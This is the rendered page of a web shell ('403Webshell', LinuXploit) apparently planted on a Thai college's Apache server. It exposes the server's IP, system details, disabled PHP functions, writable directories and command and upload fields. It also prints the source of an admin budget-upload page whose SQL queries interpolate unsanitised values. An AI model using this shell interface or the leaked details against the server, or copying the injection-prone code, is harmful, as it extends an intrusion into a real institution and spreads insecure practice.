403Webshell
Server IP : 202.29.229.35  /  Your IP : 18.189.171.154
Web Server : Apache
System : Linux aapanel2 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
User : www ( 1001)
PHP Version : 5.5.38
Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /www/wwwroot/www.ivecr2.ac.th/system_admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /www/wwwroot/www.ivecr2.ac.th/system_admin/experimentalbudget.php
<?php 
session_start();
if($_SESSION['r_statuslogin'] != 1){
 echo '<script language="javascript">alert("สำหรับผู้ดูแลระบบเท่านั้น")</script>';
 echo'<meta http-equiv="refresh" content="0;url=../index.php">';
 exit();
}
	
					$adminid=$_SESSION['r_adID'];
					//echo "---++".$wrokID;
					
					$queryperlogin = "select * from tbl_datatecher1 where tecNumber='$adminid' ";
					$resultperlogin=mysqli_query($connect1,$queryperlogin);
					$rsperteclogin=mysqli_fetch_assoc($resultperlogin);
					
					$tecPrefixThailogin=$rsperteclogin['tecPrefixThai'];//คำนำหน้าชื่อ
					$selectworklogin = $rsperteclogin['selectwork'];//กลุ่มงาน
					//คำนำหน้าชื่อ
					$sqlpflogin="select * from ref_prefix_name where PREFIX_NAME_ID=$tecPrefixThai";
					$resulpflogin=mysqli_query($connect1,$sqlpflogin);
					$rspflogin=mysqli_fetch_assoc($resulpflogin);
					$tecPrefixThaiorilogin=$rspflogin['FULLNAME'];
					
					//ชื่อกลุ่มงาน
						$sqlworklogin="select * from tbl_departmentall where daNodpt='$selectworklogin' ";
						$resqlworklogin=mysqli_query($connect1,$sqlworklogin);
						$rsworklogin=mysqli_fetch_assoc($resqlworklogin);
						$worknamelogin = $rsworklogin['daFname'];
						
   						$tecnamelogin=$tecPrefixThaiorilogin."&nbsp;".$rsperteclogin['tecFnameThai']."&nbsp;&nbsp;".$tecLnamelogin=$rsperteclogin['tecLnameThai']." (".$worknamelogin.")";
			
						
	?>

<link rel="stylesheet" type="text/css" href="style.css" />
<script src="SpryAssets/SpryValidationTextField.js" type="text/javascript"></script>
<link href="SpryAssets/SpryValidationTextField.css" rel="stylesheet" type="text/css">
<form action="?i=experInsbudget" method="post" enctype="multipart/form-data" name="form1" id="form1">
  <table width="900" border="0" align="center" cellpadding="0" cellspacing="5">
    <tr>
      <td colspan="2" align="center" valign="top"><h3>.:: เพิ่มไฟล์รายงานงบทดลองประจำปี ::.</h3></td>
    </tr>
    <tr>
      <td align="right" valign="top">&nbsp;</td>
      <td align="left" valign="top">&nbsp;</td>
    </tr>
    <tr>
      <td align="right" valign="top">&nbsp;</td>
      <td align="left" valign="top">&nbsp;</td>
    </tr>
    <tr>
      <td width="189" align="right" valign="top">งบทดลองประจำเดือน :</td>
      <td width="696" align="left" valign="top"><label for="title"></label>
        <span id="sprytextfield1">
        <input name="title" type="text" id="title" size="50">
    </span></tr>
    <tr>
      <td align="right" valign="top">&nbsp;</td>
      <td align="left" valign="top">&nbsp;</td>
    </tr>
    <tr>
      <td width="189" align="right" valign="top">แนบไฟล์  :</td>
      <td width="696" align="left" valign="top"><label for="title_file1"></label>
        <label for="fileDOC"></label>
        <input name="fileDOC" type="file" id="fileDOC" size="15">
        <font color="#FF0000">*.docx .xls .pdf เท่านั้น</font></td>
    </tr>
    <tr>
      <td align="right" valign="top">&nbsp;</td>
      <td align="left" valign="top">&nbsp;</td>
    </tr>
    <tr>
      <td align="right" valign="top">เขียนโดย :</td>
      <td align="left" valign="top">&nbsp;<?php echo $tecnamelogin;?></td>
    </tr>
    <tr>
      <td width="189" align="right" valign="top">&nbsp;</td>
      <td width="696" align="left" valign="top">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;
        <input type="submit" name="Submit" value="Submit" />
        &nbsp;&nbsp;
        <input type="reset" name="Submit2" value="Reset" /></td>
    </tr>
  </table>
</form>
<p>&nbsp; </p>
 <?php 
		  			
			$wrokID=$_SESSION['r_adID'];
			//echo "---++".$wrokID;
			$sqlwork="select * from tbladmin where addepartmentID='$wrokID' ";
			//echo $sqlwork;
			$resqlwork=mysqli_query($connect1,$sqlwork);
			$rswork=mysqli_fetch_assoc($resqlwork);
			
					if($wrokID1 == 1 || $wrokID1 == 5){
					$sql="select * from  tbl_experbudget order by df_ID desc";
					}else{
						$sql="select * from  tbl_experbudget where dp_ID='$wrokID' order by df_ID desc";
					}
					$result=mysqli_query($connect1,$sql);
					$num_dp=mysqli_num_rows($result);
				
					
?>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="1">
  <tr>
    <td width="20" height="28" align="center" valign="middle" bgcolor="#EBEBEB">&nbsp;</td>
    <td colspan="2" align="center" valign="middle" bgcolor="#EBEBEB">หลักสูตรที่เปิดสอน</td>
    <td width="227" align="center" valign="middle" bgcolor="#EBEBEB">วันที่อัพไฟล์</td>
  </tr>
 <?php
					 while($rs=mysqli_fetch_assoc($result)){
							$technumber = $rs['dp_ID'];//รหัสคนบันทึกข้อมูล
							
					$queryper = "select * from tbl_datatecher1 where tecNumber='$technumber' ";
					$resultper=mysqli_query($connect1,$queryper);
					$rspertec=mysqli_fetch_assoc($resultper);
					
					$tecPrefixThai=$rspertec['tecPrefixThai'];//คำนำหน้าชื่อ
					$selectwork = $rspertec['selectwork'];//กลุ่มงาน
					//คำนำหน้าชื่อ
					$sqlpf="select * from ref_prefix_name where PREFIX_NAME_ID=$tecPrefixThai";
					$resulpf=mysqli_query($connect1,$sqlpf);
					$rspf=mysqli_fetch_assoc($resulpf);
					$tecPrefixThaiori=$rspf['FULLNAME'];
					
   					$tecname=$tecPrefixThaiori."&nbsp;".$rspertec['tecFnameThai']."&nbsp;&nbsp;".$tecLname=$rspertec['tecLnameThai'];
			
			/*
						//ชื่อกลุ่มงาน
						$sqlwork="select * from tbl_departmentall where daNodpt='$selectwork' ";
						$resqlwork=mysqli_query($connect1,$sqlwork);
						$rswork=mysqli_fetch_assoc($resqlwork);
	
						$workname = $rswork['daFname'];
						
						*/
					if($bg == "#F5F5F5") {
						$bg = "#FDFDFD";
					} else {
						$bg = "#F5F5F5";
					}
					
		  ?>
  <tr bgcolor="<?php echo $bg?>"  >
    <td width="20" align="center" valign="middle" bgcolor="<?php echo $bg?>"><img src="images/icon07.png" width="20" height="12" /></td>
    <td width="530" align="left" valign="middle" bgcolor="<?php echo $bg?>">&nbsp;&nbsp; 
    <a href="file_experbudget/<?php echo $rs['df_file'];?>" target="_blank"><?php echo $rs['df_title'];?></a>
   &nbsp; <font color="#0099FF" size="-2"><i>โดย : <?php echo $tecname." ".$workname;?></i></font></td>
    <td width="18" align="center" valign="top" bgcolor="<?php echo $bg?>"><a href="index.php?i=del_experbudget&df_ID=<?php echo $rs['df_ID'];?>"><img src="images/33333.jpg" width="18" height="16" border="0" /></a></td>
    <td width="227" align="left" valign="top" bgcolor="<?php echo $bg?>">เมื่อ :: <?php echo displaydate($rs['df_date']);?></td>
  </tr>
  <?php
	  /**/
							$num--;
				}
				
		  ?>
</table>
<p>&nbsp;</p>
<script type="text/javascript">
var sprytextfield1 = new Spry.Widget.ValidationTextField("sprytextfield1");
</script>

Youez - 2016 - github.com/yon3zu
LinuXploit